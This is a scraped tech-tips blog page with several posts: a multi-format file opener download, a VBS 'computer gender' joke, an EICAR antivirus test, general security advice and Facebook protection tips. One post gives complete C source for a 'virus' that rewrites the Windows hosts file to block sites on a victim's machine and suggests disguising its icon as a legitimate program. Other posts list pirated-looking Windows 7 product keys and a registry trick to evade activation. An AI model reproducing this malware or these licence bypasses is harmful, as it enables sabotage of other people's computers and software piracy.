Loading...
Showing posts with label Tutorial. Show all posts
Showing posts with label Tutorial. Show all posts

1 File Opener For 75+ Formats

Click Here !!





Hello friends.. this is surely will be liked by all....


A software for all file formats..


It saves time for searching and downloading the appropriate file softwares and also the space so that it will increase the speed of system(due to the managing of the less applications...)


So here is the details for it.. the file formats which supports are here: 
(its having more than 75 different file formats)


  Web Pages (.htm, .html)
  Photoshop Documents(.psd)
  Images(.bmp, .gif, .jpg, .jpeg, .png, .tif, .tiff)
  XML Files(.resx, .xml)
  PowerPoint Presentations  (.ppt, .pptx, .pps) 
  Media (.avi, .flv, .mid, .mkv, .mp3, .mp4, .mpeg, .mpg, .mov, .wav, .wmv, .3gp, .flac) 
  Microsoft Word Documents  (.doc, .docx) 
  SRT Subtitles  (.srt) 
  RAW Images   (.arw, .cf2, .cr2, .crw, .dng, .erf, .mef, .mrw, .nef, .orf, .pef, .raf, .raw, .sr2, .x3f) 
  Icons  (.ico) 
  Open   XML Paper    (.xps) 
  ML Paper  (.xps) 
  Torrent  (.torrent) 
  Flash Animation  (.swf) 
  Archives  (.7z, .gz, .jar, .rar, .tar, .tgz, .zip) 
  Rich Text Format  (.rtf) 
  Text Files  (.bat, .cfg, .ini, .log, .reg, .txt) 
  Apple Pages  (.pages) 
  Microsoft Excel Documents   (.xls, .xlsm, .xlsx) 
  Comma-Delimited  (.csv) 
  Outlook Messages  (.msg) 
  PDF Documents  (.pdf) 
  vCard Files  (.vcf) 
  EML Files  (.eml)


Here is the Download link for it::


FILE OPENER


IT SUPPROTED FOR WINDOWS 7 , XP,VISTA

0 Check Your Computer Male or Female




This is  funny  trick that let you Know  the  Gender  Of  Your Computer whether it  isMale or Female. So let get Started.


I am Lucky to have a Male Computer but what's about yours 
Computer or Laptop?  


Just Follow The Below Simple Steps  and you have your Answer.



  •      Open Notepad and paste the following Codes.


           CreateObject("SAPI.SpVoice").Speak"i love you" 
     

  •       Save the file as gender.vbs      

  •       Now, Open the Save File and it shows as the following  
  •         Image







You are Done. Now just double click to open it after saving and you will hear a voice saying that I Love You.


If you hear a male voice you got male PC and if you hear a Female voice you got a Female One. 


Don't Wait , do it and share with us.


My computer is male what about you ?
      



Click Here !!

0 Any Time Upgrade For Windows 7

Click Here !!



Today we will tell about new trick to upgrading your
genuine windows7  any version to Home Premium or 
Professional or the most favourite Ultimate Version.
The things you have to need is
  • A genuine Windows 7 Any version
  • The magical key provided my me  

Follow The Instructions Below : -


1.First Connect Your PC to Internet.
2.Then go to your control panel  and click on Windows 
Anytime Upgrade.
3.Here you will get a window asking your anytime upgrade keys
4.Just copy paste this keys according to your version and click next 
5.Then it will verify saying its ok , click on next button
6.A new window will open saying it may take few minute
7.After few minute it will say your keys not working or something
Just close the windows and restart your PC and see the magic




Widnows 7 Home Premium:



  • 6RBBT-F8VPQ-QCVPQ-KHRB8-RMV82



Windows 7 Professional: 



  • VTDC3-WM7HP-XMPMX-K4YQ2-WYGJ8         
  • 6RQ9V-6GCG4-8WV2H-966GF-DQ4DW         
  • 32KD2-K9CTF-M3DJT-4J3WC-733WD



Windows 7 Ultimate:  



  • FJGCP-4DFJD-GJY49-VJBQ7-HYRR2
  • 342DG-6YJR8-X92GV-V7DCV-P4K2

0 Free Web Hosting Websites and Fake E mailer Websites

0 A Virus Program to Block Websites

Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.



This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.

NOTE: You can also block a website manually. But, here I have created a virus that automates all the steps involved in blocking.

Here is the sourcecode of the virus.

#include<stdio.h>
#include<dos.h>
#include<dir.h> char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;
int find_root(void);
void block_site(void);
int find_root()
{
int done;
struct ffblk ffblk;//File block structure
done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
else return 0;
}
void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/
fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}
void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}

How to Compile ?

Testing

1. To test, run the compiled module. It will block the sites that is listed in the source code.

2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.

3. To remove the virus type the following the Run. 

%windir%\system32\drivers\etc
4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this

127.0.0.1                                google.com
5. Delete all such entries which contain the names of blocked sites.

NOTE: You can also change the ICON of the virus to make it look like a legitimate program.

0 How to Test the Working of your Antivirus – EICAR Test


Have you ever wondered how to test your Antivirus software to ensure it’s proper working? Well here is a quick and easy way to test your antivirus. The process is called EICAR test which will work on any antivirus and was developed by European Institute of Computer Antivirus Research. This process can be used by people, companies and antivirus programmers to test the proper functioning of the antivirus/antimalware software without having to deal with the real computer virus which can cause damage to the computer. Here is a step-by-step procedure to test your antivirus.


1. Open a notepad (New Text Document.TXT) and copy the following code exactly onto it, and save the notepad.

EICAR Test code
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
2. Rename the file from New Text Document.TXT to myfile.com

3. Now run the antivirus scan on this myfile.com file.

If the antivirus is functioning properly on your computer, then it should generate a warning and immediately delete the file upon scanning. Otherwise you may have to re-install your antivirus.

NOTE: Most antivirus will pop-out a warning message in the Step-1 itself

You can also place the myfile.com file in a ZIP or RAR file and run a scan on it so as to ensure whether your antivirus can detect the test string in the compressed archive. Any antivirus when scanning this file will respond exactly as it will do for a genuine virus/malicious code. This test will cause no damage to your computer even though the antivirus will flag it as a malicious script. Hence it is the safest method to test the proper functioning of any antivirus.

0 How to Use Windows 7 Without Activation?

Most of you might be aware of the fact that it is possible to use Windows 7 and Vista for 120 days without activation. This is actually possible using the slmgr -rearm command which will extend the grace period from 30 days to 120 days. However in this post I will show you a small trick using which it is possible to use Windows 7 without activation for approximately an year! Here is a way to do that.

1. Goto “Start Menu -> All Programs -> Accessories” . Right click on “Command Prompt” and select “Run as Administrator“. If you are not the administrator then you are prompted to enter the password, or else you can proceed to step-2.



2. Now type the following command and hit enter

slmgr -rearm
 
3. You will be prompted to restart the computer. Once restarted the trial period will be once again reset to 30 days. You can use the above command for up to 3 times by which you can extend the trial period to 120 days without activation.

4. Now comes the actual trick by which you can extend the trial period for another 240 days. Open Registry Editor (type regedit in “Run” and hit Enter) and navigate to the following location

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform

5. In right-side pane, change value of SkipRearm to 1.

6. Now you will be able to use the slmgr -rearm command for another 8 times so that you can skip activation process for another 240 days. So you will get 120 + 240 = 360 days of free Windows 7 usage.

120 days using “slmgr -rearm” command before registry edit +                                                                                                                                                                
240 days using “slmgr -rearm” command after registry edit
 =      360 Days

Try It



0 10 security tips for all general-purpose OSes


There are key considerations for system security that apply no matter which general-purpose operating system platform you happen to be using. You should always consider the following precautions when securing your systems against unauthorized access and unfortunate disasters:
  1. Use strong passwords. One of the simplest ways to improve security is to use a password that isn’t easily guessed by brute force attacks. A brute force attack is one where the attacker uses an automated system to guess passwords as quickly as possible, hopefully finding the right password before long. Passwords that include special characters and spaces, use both capital and lowercase letters, avoid words in the dictionary, as well as numbers, are much more difficult to crack than your mother’s name or your anniversary date. Remember as well that increasing the length of your password by one single character multiplies the total number of possibilities by the number of valid characters that can be used. In general, anything less than eight characters is considered far too easy to crack. Ten, 12, or even 16 is better. Just don’t make it too long to remember or too difficult to type.
  2. Invest in good perimeter defense. Not all security occurs on the desktop. It’s a good idea to use an external firewall/router to help protect your computer, even if you only have one computer. At the low end, you can purchase a retail router device, such as the commercial Linksys, D-Link, and Netgear routers that are available in stores such as Best Buy, Circuit City, and CompUSA. Higher up the scale, you can get managed switches, routers, and firewalls from “Enterprise” class vendors such as Cisco, Vyatta, and Foundry Networks. Starting somewhere in the middle and moving all the way up to direct competition with the major “Enterprise” class vendors, you can put together your own firewalls either “from scratch” or using prepackaged firewall/router installers such as m0n0wall and IPCop. Proxy servers, antivirus gateways, and spam filtering gateways can all contribute to stronger perimeter security as well. Remember that in general switches are better for security than hubs, routers with NAT are better than switches, and firewalls are a definite necessity.
  3. Update your software. While concerns such as patch testing before deployment to production systems may be of critical importance in many circumstances, ultimately security patches must be rolled out to your systems. Ignoring security updates for too long can result in the computers you use becoming easy targets for unscrupulous security crackers. Don’t let the software installed on your computers fall too far behind the security update schedule. The same applies to any signature-based malware protection software such as antivirus applications (if your system needs them), which cannot be any more effective than the degree to which they are kept up to date with current malware signature definitions.
  4. Shut down services you don’t use. Often, computer users don’t even know which network accessible services are running on their systems. Telnet and FTP are common offenders that should be shut down on computers where they are not needed. Make sure you’re aware of every single service running on your computer, and have a reason for it to be running. In some cases, this may require reading up on the importance of that service to your particular needs so that you don’t make a mistake like shutting off the RPC service on a Microsoft Windows machine and disallow logging in, but it’s always a good idea to have nothing running that you don’t actually use.
  5. Employ data encryption. Varying levels of data encryption coverage are available to the security-conscious computer user or sysadmin, and choosing the right level of encryption for your needs is something that must be decided based on circumstances. Data encryption can range from use of cryptographic tools on a file-by-file basis, through filesystem encryption, up to full disk encryption. Typically, this doesn’t cover the boot partition, as that would require decryption assistance from specialized hardware, but if your need for privacyis great enough to justify the expense, it’s possible to get such whole-system encryption. For anything short of boot partition encryption, there are a number of solutions available for each level of encryption desired, including both commercial proprietary systems and open source systems for full disk encryption on every major desktop operating system.
  6. Protect your data with backups. One of the most important ways you can protect yourself from disaster is to back up your data. Strategies for data redundancy can range from something as simple and rudimentary as periodically saving copies to CD to complex, staggered, periodic automated backups to a server. On systems that must maintain constant uptime without loss of service, RAID can provide automatic failover redundancy in case of a disk failure. Free backup tools such as rsync and Bacula are available for putting together automated backup schemes of arbitrary complexity. Version control systems such as Subversion can provide flexible data management so that you can not only have backups on another computer, but you can keep more than one desktop or laptop system up to date with the same data without a great deal of difficulty. Using subversion in this manner saved my bacon in 2004 when my working laptop suffered a catastrophic drive failure, emphasizing the importance of regular backups of critical data.
  7. Encrypt sensitive communications. Cryptographic systems for protecting communications from eavesdroppers are surprisingly common. Software supporting OpenPGP for e-mail, the Off The Record plug-ins for IM clients, encrypted tunnel software for sustained communication using secure protocols such as SSH and SSL, and numerous other tools can be had easily to ensure that data is not compromised in transit. In person-to-person communications, of course, it can sometimes be difficult to convince the other participant to use encryption software to protect communications, but sometimes that protection is of critical importance.
  8. Don’t trust foreign networks. This is especially important on open wireless networks such as at your local coffee shop. If you’re careful and smart about security, there’s no reason you cannot use a wireless network at a coffee shop or some other untrusted foreign network, but the key is that you have to ensure security through your own system, and not trust the foreign network to be safe from malicious security crackers. For instance, it is much more critical that you protect sensitive communications with encryption on an open wireless network, including when connecting to Web sites where you use a login session cookie to automate authentication or enter a username and password. Less obviously, make sure you don’t have any network services running that are not strictly necessary, as they can be exploited if there is an unpatched vulnerability. This applies to network filesystem software such as NFS or Microsoft CIFS, SSH servers, Active Directory services, and any of a number of other possibilities. Check your systems both from the inside and the outside to determine what opportunities malicious security crackers may have to attempt to compromise your computer, and make sure those points of entry are as locked down as reasonably possible. In some respects, this is just an extension of the points about shutting down unneeded services and encrypting sensitive communications, except that in dealing with foreign networks you must be especially stingy with the services you allow to run on your system and what communications you consider “sensitive.” Protecting yourself on a foreign, untrusted network may in fact require a complete reworking of your system’s security profile.
  9. Get an uninterruptible power supply. You don’t just want a UPS so you won’t lose files if the power goes out. There are other, ultimately more important reasons, such as power conditioning and avoiding filesystem corruption. For this reason, make sure you get something that works with your operating system to notify it when it needs to shut itself down, in case you aren’t home when the power goes out, and make sure you get a UPS that provides power conditioning as well as battery back-up. A surge protector simply isn’t enough to protect your system against damage from “dirty” power. Remember, a UPS is key to protecting both your hardware and your data.
  10. Monitor systems for security threats and breaches. Never assume that just because you’ve gone through a checklist of security preparations your systems are necessarily safe from security crackers. You should always institute some kind of monitoring routine to ensure that suspicious events come to your attention quickly and allow you to follow up on what may be security breaches or threats to security. This sort of attention should not only be spent on network monitoring but also integrity auditing and/or other local system security monitoring techniques.
Other security precautions may apply depending on the specific OS you use. Some operating systems provide additional challenges to security because of design characteristics that produce a less-than-optimal security profile, and some operating systems grant the knowledgeable sysadmin capabilities for increased security that may not exist elsewhere. All of this should be kept in mind when securing your system, whether using proprietary systems such as Microsoft Windows and Apple Mac OS X or open source systems such as your favorite Linux distribution, FreeBSD, NetBSD, or even the very security-conscious OpenBSD.
Only in the very rarest of circumstances is a default install of your OS of choice, with no further thought to securing the system, truly sufficient. Start with the above enumerated security concerns regardless of your operating system, then consider the specific security needs and opportunities of your platform. Don’t leave the integrity of your system’s security up to luck.


1 HOW TO PROTECT YOUR FACEBOOK ACCOUNT FROM HACKERS


Several times a month I learn that one of my friends on Facebook has been hacked.
Here are some simple practices that will help to prevent that from happening.

#1 – ENABLE HTTPS

When you bookmark the URL for Facebook or any of your other social networks, be sure to use HTTPS instead of HTTP.  This encrypts your communications.
In fact, you will have to temporarily disable this feature any time you give access to a new application.  That alone should give you confidence that you have achieved a greater level of protection.

#2 – DISABLE ONLINE CHAT

All of us have witnessed Facebook scams, with the most common being the infamous chat message … “I’m in the UK and have been mugged – please send money so I can get back home.”
While I have no technical basis for this, it stands to reason that the hackers get in through the chat service. Every time I have noticed bogus comments allegedly made by me to my Facebook friends, it is because I had previously used the online chat.
To disable chat just click on the little wheel in the right sidebar and take yourself offline. Then close the window and make sure is registers as chat offline.

#3 – REVIEW PERMISSIONS GRANTED TO THIRD PARTY APPS

When you grant access to Facebook apps, those permissions endure long after you stop using them.  Go to this link to review your Facebook app permissions – and disable any you are no longer using.
You will probably be surprised at the long list permissions your have previously granted!

#4 – ACTIVATE TEXT MESSAGE NOTIFICATIONS

Facebook allows you to receive text notifications whenever your account is accessed from a device other than your primary computer or mobile device.
You simply go to Account Settings and then to Security Settings to set-up the proper notifications to your mobile device.
First go to login approvals – then login notifications.
You can only choose email or text notifications.  By choosing text notifications you not only get an immediate notice, but you also activate both your mobile device and your primary computer as approved access points.

#5 – MAINTAIN PUBLIC AND PRIVATE EMAIL ADDRESSES

The email address you use for Facebook should be distinct from the one you use where security is more critical – such as your online banking or Paypal account.
If your Facebook account gets hacked its embarrassing.  If that is the same email used on your more secure accounts, now that vulnerability could be costly.
Obviously, if you are selective with your email addresses and periodically change your passwords, your minimize your chances of being hacked.
Did you know that anyone can search Facebook for an email address?  For example, if you are looking a common name such as John Smith, you only need to search with an email to find the right one.
This is handy for finding your friends on Facebook, but also useful for hackers.  The safe bet is to use distinct passwords for your public and private email addresses.
There are even more ways to protect your Facebook and other online accounts, but these 5 are the most essential. And they are specific to Facebook, which seems to be the site that is the most vulnerable.


 

Tech For You Copyright © 2011 - |- Template created by Jay Ruparel - |- Powered by tfy2012

Share
back to top

Recent Posts